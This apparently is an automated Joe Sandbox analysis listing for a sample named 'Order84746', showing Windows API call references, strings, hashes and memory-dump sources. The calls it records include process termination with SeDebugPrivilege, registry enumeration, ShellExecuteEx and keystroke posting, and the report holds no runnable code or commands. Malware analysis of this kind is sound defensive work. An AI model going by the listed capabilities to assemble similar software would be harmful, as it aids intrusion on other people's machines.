                          • Instruction Fuzzy Hash: 36619B30926608CFDB359F29D988B35B7F9FF96356F14012DE642C6A70C770A884EB80
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0094B3F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 0bf30f365946f6f308ec44bf0b6775d879a05df205a6fb88edc872c0d9555bc3
                          • Instruction ID: 71a97eca58ebf81e7cefa0d6e68cc68f0ad8065630945918b165d56739af080f
                          • Opcode Fuzzy Hash: 0bf30f365946f6f308ec44bf0b6775d879a05df205a6fb88edc872c0d9555bc3
                          • Instruction Fuzzy Hash: 6951C130A05208BFEF249F29CC85FAD7BA8FF05764F244415F625D62E2C771E9409B51
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0095DB1B
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095DB3C
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0095DB51
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0095DB6E
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0095DB95
                          • DestroyCursor.USER32(00000000), ref: 0095DBA0
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0095DBBD
                          • DestroyCursor.USER32(00000000), ref: 0095DBC8
                          Similarity
                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                          • String ID:
                          • API String ID: 3992029641-0
                          APIs
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00925FA6,?), ref: 00926ED8
                            • Part of subcall function 00926EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00925FA6,?), ref: 00926EF1
                            • Part of subcall function 009272CB: GetFileAttributesW.KERNEL32(?,00926019), ref: 009272CC
                          • lstrcmpiW.KERNEL32(?,?), ref: 009275CA
                          • _wcscmp.LIBCMT ref: 009275E2
                          • MoveFileW.KERNEL32(?,?), ref: 009275FB
                          Similarity
                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                          • String ID:
                          • API String ID: 793581249-0
                          APIs
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 008FEAEB
                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 008FEB32
                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 0095DC86
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0095DAD1,00000004,00000000,00000000), ref: 0095DCF2
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0091AEF1,00000B00,?,?), ref: 0091B26C
                          • RtlAllocateHeap.NTDLL(00000000,?,0091AEF1), ref: 0091B273
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0091AEF1,00000B00,?,?), ref: 0091B288
                          • GetCurrentProcess.KERNEL32(?,00000000,?,0091AEF1,00000B00,?,?), ref: 0091B290
                          • DuplicateHandle.KERNEL32(00000000,?,0091AEF1,00000B00,?,?), ref: 0091B293
                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0091AEF1,00000B00,?,?), ref: 0091B2A3
                          • GetCurrentProcess.KERNEL32(0091AEF1,00000000,?,0091AEF1,00000B00,?,?), ref: 0091B2AB
                          • DuplicateHandle.KERNEL32(00000000,?,0091AEF1,00000B00,?,?), ref: 0091B2AE
                          • CreateThread.KERNEL32(00000000,00000000,0091B2D4,00000000,00000000,00000000), ref: 0091B2C8
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                          • String ID:
                          • API String ID: 1422014791-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          APIs
                            • Part of subcall function 00926532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00926554
                            • Part of subcall function 00926532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00926564
                            • Part of subcall function 00926532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009265F9
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094179A
                          • GetLastError.KERNEL32 ref: 009417AD
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009417D9
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00941855
                          • GetLastError.KERNEL32(00000000), ref: 00941860
                          • CloseHandle.KERNEL32(00000000), ref: 00941895
                          Strings
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 009258B8
                          Strings
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0092A806
                          Similarity
                          • API ID: ArraySafeVartype
                          • String ID:
                          • API String ID: 1725837607-0
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00926B63
                          • LoadStringW.USER32(00000000), ref: 00926B6A
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00926B80
                          • LoadStringW.USER32(00000000), ref: 00926B87
                          • _wprintf.LIBCMT ref: 00926BAD
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00926BCB
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00926BA8
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00942BF6
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper
                          • String ID:
                          • API String ID: 2595220575-0
                          APIs
                          • __mtinitlocknum.LIBCMT ref: 0090A991
                            • Part of subcall function 00907D7C: __FF_MSGBANNER.LIBCMT ref: 00907D91
                            • Part of subcall function 00907D7C: __NMSG_WRITE.LIBCMT ref: 00907D98
                            • Part of subcall function 00907D7C: __malloc_crt.LIBCMT ref: 00907DB8
                          • __lock.LIBCMT ref: 0090A9A4
                          • __lock.LIBCMT ref: 0090A9F0
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00996DE0,00000018,00915E7B,?,00000000,00000109), ref: 0090AA0C
                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0090AA29
                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0090AA39
                          Similarity
                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                          • String ID:
                          • API String ID: 1422805418-0
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00948EE4
                          • GetDC.USER32(00000000), ref: 00948EEC
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00948EF7
                          • ReleaseDC.USER32(00000000,00000000), ref: 00948F03
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00948F3F
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00948F50
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0094BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00948F8A
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00948FAA
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          APIs
                          Similarity
                          • API ID: ErrorLast$htonsinet_ntoaselect
                          • String ID:
                          • API String ID: 500251541-0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e7c2e6e2ba7346d9d0e08199348b4221a27fe3396387431792952f847c470c2
                          • Instruction ID: 496d86cd79b4292670929c94e0d59a89e1e4d5c5847bae42f821b1fe9888491b
                          • Opcode Fuzzy Hash: 2e7c2e6e2ba7346d9d0e08199348b4221a27fe3396387431792952f847c470c2
                          • Instruction Fuzzy Hash: FC716FB190410DEFCB18CF68CC85ABE7B79FF85314F248149FA19AA255C7309A41CF61
                          APIs
                          • _memset.LIBCMT ref: 0094225A
                          • _memset.LIBCMT ref: 00942323
                          • ShellExecuteExW.SHELL32(?), ref: 00942368
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                            • Part of subcall function 008FC6F4: _wcscpy.LIBCMT ref: 008FC717
                          • CloseHandle.KERNEL32(00000000), ref: 0094242F
                          • FreeLibrary.KERNEL32(00000000), ref: 0094243E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 4082843840-2766056989
                          • Opcode ID: de7fd2aa5d5b34803db9db6affde09e22a9d206b2618afaf96877acfbe58e81e
                          • Instruction ID: 254a8fb5099a873263773f0f54e6d78d1b66c6bc2c7d0c2cffcf525e0884f5e8
                          • Opcode Fuzzy Hash: de7fd2aa5d5b34803db9db6affde09e22a9d206b2618afaf96877acfbe58e81e
                          • Instruction Fuzzy Hash: 64717D74A006199FCF14EFA9C981AAEBBF5FF48310F108459F855AB3A1DB34AD40CB91
                          APIs
                          • GetParent.USER32(00000000), ref: 00923C02
                          • GetKeyboardState.USER32(?), ref: 00923C17
                          • SetKeyboardState.USER32(?), ref: 00923C78
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00923CA4
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00923CC1
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00923D05
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00923D26
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: ddbc1467fa6e3e951d5c855973e66bfd4dbf1b7280fc62565ef3cbbc92edfab9
                          • Instruction ID: aa19a6717fff7bad6a6dce26e73d8eb2f770a28f69c24ec2cd417ee87fcc473b
                          • Opcode Fuzzy Hash: ddbc1467fa6e3e951d5c855973e66bfd4dbf1b7280fc62565ef3cbbc92edfab9
                          • Instruction Fuzzy Hash: 6A51E6A0A087E53DFB328734DC45B76BF9D6B06300F08C489E5D5568C7D698EE94E750
                          APIs
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00948FE7
                          • GetWindowLongW.USER32(00FE9718,000000F0), ref: 0094901A
                          • GetWindowLongW.USER32(00FE9718,000000F0), ref: 0094904F
                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00949081
                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009490AB
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 009490BC
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009490D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: ad6c34a904142c5f034741dcbf087bc9ed77a81c440346238226e8d16263a777
                          • Instruction ID: c21644bee6658b81118bf10db4a4328f9798b920d97d899eb1bd5f7bf909fde1
                          • Opcode Fuzzy Hash: ad6c34a904142c5f034741dcbf087bc9ed77a81c440346238226e8d16263a777
                          • Instruction Fuzzy Hash: E7310334758215AFDB20CF58DC85F6637A9FB4A754F1441A8F619CB2B1CBB2AC40EB81
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009208F2
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00920918
                          • SysAllocString.OLEAUT32(00000000), ref: 0092091B
                          • SysAllocString.OLEAUT32(?), ref: 00920939
                          • SysFreeString.OLEAUT32(?), ref: 00920942
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00920967
                          • SysAllocString.OLEAUT32(?), ref: 00920975
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 7c245c6a61fcb1ab9c2ed7f95495fa8cf087402882f1a82a4645c8a967024a31
                          • Instruction ID: 6a12057a621bbece4faaca7636dd4a6df55d86feed4d98f92152c57d99a37b1a
                          • Opcode Fuzzy Hash: 7c245c6a61fcb1ab9c2ed7f95495fa8cf087402882f1a82a4645c8a967024a31
                          • Instruction Fuzzy Hash: 3921C776605218AFAB109FBCDC88DBB73ACFF49360B008525F915DB1A6D6B0EC45DB60
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: 881008478ed546bfcec75575c70f5fdfec8d26803bb6905f3216e4c4766cd21b
                          • Instruction ID: 2bc2c72af83208b7cfd148b6d2f41af5975a19027a9dd0541427aa9fbe30ca55
                          • Opcode Fuzzy Hash: 881008478ed546bfcec75575c70f5fdfec8d26803bb6905f3216e4c4766cd21b
                          • Instruction Fuzzy Hash: 90214C3210853577D320BB38AD12FB773ACEFA5314F54C42AF949D7086E7559A42C3A5
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009209CB
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009209F1
                          • SysAllocString.OLEAUT32(00000000), ref: 009209F4
                          • SysAllocString.OLEAUT32 ref: 00920A15
                          • SysFreeString.OLEAUT32 ref: 00920A1E
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00920A38
                          • SysAllocString.OLEAUT32(?), ref: 00920A46
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 1c59df12aacf7cf96a9932e05df7db701a4013d673d865e5e9fd94c8e1f63df2
                          • Instruction ID: a74c030226cbde59ba6ce5e2b63b51e06a408861402185e745fd442916da4668
                          • Opcode Fuzzy Hash: 1c59df12aacf7cf96a9932e05df7db701a4013d673d865e5e9fd94c8e1f63df2
                          • Instruction Fuzzy Hash: 4421C435605214AFDB109FBCDC88CAB73ECEF493607408125F919CB2A6DAB0EC459B60
                          APIs
                            • Part of subcall function 008FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                            • Part of subcall function 008FD17C: GetStockObject.GDI32(00000011), ref: 008FD1CE
                            • Part of subcall function 008FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0094A32D
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0094A33A
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0094A345
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0094A354
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0094A360
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 66ff53317398f526711327f6139d66f5c6c3e7a6b1b679a93ff66dc865d47d03
                          • Instruction ID: 8ae05e7673c287f29405c6c3f5e07bc337eec512ed38d75d41584c155f134fbb
                          • Opcode Fuzzy Hash: 66ff53317398f526711327f6139d66f5c6c3e7a6b1b679a93ff66dc865d47d03
                          • Instruction Fuzzy Hash: 8C1190B115021DBEEF119F64CC85EEB7F6DFF09798F014114FA08A60A0D6729C21DBA4
                          APIs
                          • GetClientRect.USER32(?,?), ref: 008FCCF6
                          • GetWindowRect.USER32(?,?), ref: 008FCD37
                          • ScreenToClient.USER32(?,?), ref: 008FCD5F
                          • GetClientRect.USER32(?,?), ref: 008FCE8C
                          • GetWindowRect.USER32(?,?), ref: 008FCEA5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: d1a697030baee6a8c76167a8679c221b85147a166bc1a5cc61a8e5c7ab3f9590
                          • Instruction ID: 6aa7c7f3f68f2903bf42c554b11a70d5832489e39ab9d6e9de5bbcdcd24b9999
                          • Opcode Fuzzy Hash: d1a697030baee6a8c76167a8679c221b85147a166bc1a5cc61a8e5c7ab3f9590
                          • Instruction Fuzzy Hash: 34B14579A0024DDBDB14CFB9C5806EEBBB1FF08304F148129ED69EB250DB71AA54CB64
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00941C18
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00941C26
                          • __wsplitpath.LIBCMT ref: 00941C54
                            • Part of subcall function 00901DFC: __wsplitpath_helper.LIBCMT ref: 00901E3C
                          • _wcscat.LIBCMT ref: 00941C69
                          • Process32NextW.KERNEL32(00000000,?), ref: 00941CDF
                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00941CF1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 1380811348-0
                          • Opcode ID: e4310e0b05a8c049f90b1a443042cf4568be00e7d99a94b51f367fd0fa14999a
                          • Instruction ID: 09048ba433761cd1ff604e4d7e23b5af86904c6d5c34df56eb5726483d433adb
                          • Opcode Fuzzy Hash: e4310e0b05a8c049f90b1a443042cf4568be00e7d99a94b51f367fd0fa14999a
                          • Instruction Fuzzy Hash: 24513B715083449FD720EF24C885EABB7E8FB89754F00491EF585D6291EB709A458B92
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009430AF
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009430EF
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00943112
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0094313B
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0094317E
                          • RegCloseKey.ADVAPI32(00000000), ref: 0094318B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
